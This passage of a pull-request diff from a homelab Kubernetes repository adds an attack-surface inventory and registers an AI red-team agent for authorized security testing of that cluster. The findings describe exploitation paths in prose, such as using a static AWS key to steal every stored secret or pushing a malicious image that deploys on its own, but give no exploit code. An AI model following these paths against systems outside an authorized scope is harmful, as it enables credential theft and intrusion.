+- **Per-IP vs per-user**: Needs verification — if per-IP, source rotation bypasses ban
+- **Severity**: Low (Authelia requires 2FA, making password-only attacks insufficient)
+
+---
+
+## Authorization Layer
+
+### AUTHZ-001: Homepage ClusterRole — Cluster-Wide Read
+
+**Component**: `homepage` ClusterRole + ClusterRoleBinding
+
+The homepage ServiceAccount can read namespaces, pods, nodes, metrics, HTTPRoutes, and gateways cluster-wide.
+
+- **Exploitation**: Compromised homepage pod → enumerate full cluster topology, all pod names, node IPs, all routes
+- **Severity**: Low (read-only, but valuable for reconnaissance)
+
+### AUTHZ-002: Prometheus Admin API Enabled
+
+**Component**: kube-prometheus-stack configuration (`enableAdminAPI: true`)
+
+The Prometheus admin API allows snapshot creation, series deletion, and other admin operations. Protected only by OAuth2-Proxy on the internal gateway.
+
+- **Exploitation**: Authenticated internal user can delete metrics data, create snapshots, or manipulate Prometheus state
+- **Severity**: Medium (requires authenticated access)
+
+---
+
+## Container Layer
+
+### CTR-001: Gluetun — Root, NET_ADMIN, No Mesh
+
+**Component**: qBittorrent Gluetun sidecar in media namespace
+
+Runs as root with NET_ADMIN + NET_RAW capabilities, explicitly opted out of Istio mesh (`istio.io/dataplane-mode: none`), and has unrestricted world egress via `media-qbittorrent-egress` CNP.
+
+- **Exploitation**: Compromise → root container with full internet access and no mTLS, bypassing all mesh security
+- **Design rationale**: WireGuard VPN requires NET_ADMIN and root for tunnel creation
+- **Severity**: High (most privileged non-system container)
+
+### CTR-002: Cilium Agent Capabilities
+
+**Component**: Cilium agent DaemonSet
+
+Runs with SYS_ADMIN, BPF, NET_ADMIN, NET_RAW, and several other elevated capabilities.
+
+- **Exploitation**: Compromise → eBPF access, network interception, packet manipulation on the node
+- **Design rationale**: Required for Cilium CNI operation
+- **Severity**: Critical (but exploitation requires breaking into the Cilium agent specifically)
+
+---
+
+## Credential Layer
+
+### CRED-001: Static AWS IAM Key
+
+**Component**: `external-secrets-access-key` Secret in `kube-system`
+
+Static long-lived AWS IAM key with read access to all SSM parameters under `/homelab/kubernetes/`.
+
+- **SSM contents**: Cloudflare API token, GitHub OAuth secrets, NordVPN credentials, Istio mesh CA private key
+- **Exploitation**: Read this secret → access all secrets in AWS SSM → full credential theft
+- **Severity**: Critical (keys to the kingdom)
+
+### CRED-002: Garage S3 Admin API from Gateway Namespace
+
+**Component**: Garage admin port 3903, network policy allows istio-gateway access
+
+The Garage admin API is reachable from the istio-gateway namespace.
+
+- **Exploitation**: Compromised gateway pod → list/create/delete S3 buckets, manage access keys, read stored objects
+- **Severity**: High (full S3 admin access)
+
+---
+
+## Supply Chain Layer
+
+### SC-001: Integration Auto-Deploy
+
+**Component**: OCI promotion pipeline, Flux ImagePolicy
+
+Any OCI artifact tagged `integration-*` auto-deploys to the integration cluster.
+
+- **Exploitation**: Push a malicious artifact to GHCR with an `integration-*` tag → auto-deployed
+- **RBAC requirement**: Must have GHCR push access (GitHub token)
+- **Severity**: High (arbitrary code execution on integration)
+
+### SC-002: PXE Boot Shell Option
+
+**Component**: PXE boot server, iPXE menu
+
+The iPXE menu includes a `shell` option accessible from the cluster node subnet.
+
+- **Exploitation**: L2 access to cluster subnet → PXE boot → iPXE shell → potential cluster join
+- **Severity**: Medium (requires physical/L2 network access)
+
+### SC-003: Metrics-Server Insecure TLS
+
+**Component**: metrics-server with `--kubelet-insecure-tls`
+
+Skips kubelet serving certificate validation, creating an MITM opportunity.
+
+- **Exploitation**: MITM on kubelet-to-metrics-server path → inject false resource metrics
+- **Design rationale**: Standard pattern for Talos clusters with self-signed kubelet certs
+- **Severity**: Low (requires network-level MITM within cluster)

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -514,6 +514,7 @@ Users interact through 3 specialized agents via commands in `.claude/commands/`:
 | `/troubleshoot` | `troubleshooter` | SRE debugging specialist | sre, k8s, loki, prometheus, promotion-pipeline, network-policy |
 | `/implement` | `implementer` | Platform engineer | flux-gitops, app-template, terragrunt, opentofu-modules, deploy-app, taskfiles, k8s, secrets, monitoring-authoring, cnpg-database, gateway-routing, versions-renovate, kubesearch, promotion-pipeline, gha-pipelines, network-policy |
 | `/design` | `designer` | Principal architect (Opus, plan mode) | kubesearch, architecture-review, k8s |
+| `/security-test` | `security-tester` | Adversarial red team tester (Opus) | security-testing, k8s, network-policy, prometheus, loki, sre, gateway-routing |
 
 Agent definitions live in `.claude/agents/`. See [.claude/skills/CLAUDE.md](.claude/skills/CLAUDE.md) for the full agent-first architecture.
 
@@ -543,6 +544,7 @@ Skills are composed by agents internally — not invoked directly by users:
 | `promotion-pipeline` | OCI artifact promotion tracing and rollback | troubleshooter, implementer |
 | `kubesearch` | Researching Helm chart configurations | designer, implementer |
 | `architecture-review` | Technology standards and evaluation criteria | designer |
+| `security-testing` | Adversarial security testing methodology and attack surface inventory | security-tester |
 | `sync-claude` | Validate and sync Claude docs before commits | orchestrator |
 | `self-improvement` | Capture feedback to enhance documentation and skills | orchestrator |
 


### PR DESCRIPTION
## Summary
- Add a fourth specialized agent (`/security-test`) for authorized adversarial security testing against the homelab, following the same agent-skill architecture as troubleshooter/implementer/designer
- Create `security-testing` skill with 5-phase attack methodology (network, auth, escalation, exfiltration, supply chain) and a reference doc cataloging 15 known attack surfaces across 6 layers
- Register the new skill, hubble, and nmap permissions in settings.json and update CLAUDE.md inventory tables

## Test plan
- [ ] Verify `/security-test` command is recognized and dispatches to the security-tester agent
- [ ] Confirm the agent composes all 7 skills (security-testing, k8s, network-policy, prometheus, loki, sre, gateway-routing)
- [ ] Run `/security-test network policy recon on dev` and verify scope confirmation via AskUserQuestion before any active testing
- [ ] Validate attack-surface.md references match actual codebase paths